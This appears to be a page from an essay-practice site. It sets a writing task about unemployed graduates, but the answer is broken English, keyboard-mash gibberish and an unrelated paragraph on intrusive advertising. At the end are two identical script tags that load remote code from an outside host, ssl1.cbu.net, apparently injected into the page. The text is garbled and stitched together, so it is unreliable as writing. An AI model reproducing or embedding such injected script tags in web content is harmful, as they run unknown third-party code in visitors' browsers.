In many countries today there are many highly qualified graduates without employment.

What factors may have caused this situation and what, in your opinion, can/should be done about it?

I wanna job. thank you for asking but is it easy to get a employment? I am not sure please help me I wnna payment Thanksbut i isnt too long to bite me dhdjjajs dj fjsjskjajahsjkskkhbbbbb dhsjxjncnejskqkak shjsisbfnsjwkbsnnsjddjndndsnsnnsjsjsnTo begin with, the fact that we cannot escape from advertising is a significant cause for complaint. Constant images and signs wherever we look can be very intrusive and irritating at times. Take for example advertising on the mobile phone. With the latest technology mobile companies are now able to send advertising messages via SMS to consumers' phones whenever they choose. Although we expect adverts in numerous situations, it now seems that there are very few places we can actually avoid them. shjsncnekhowhdkdjdjbdbdjsndnsnsnsbsbsbsbbsbsbsbsb<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>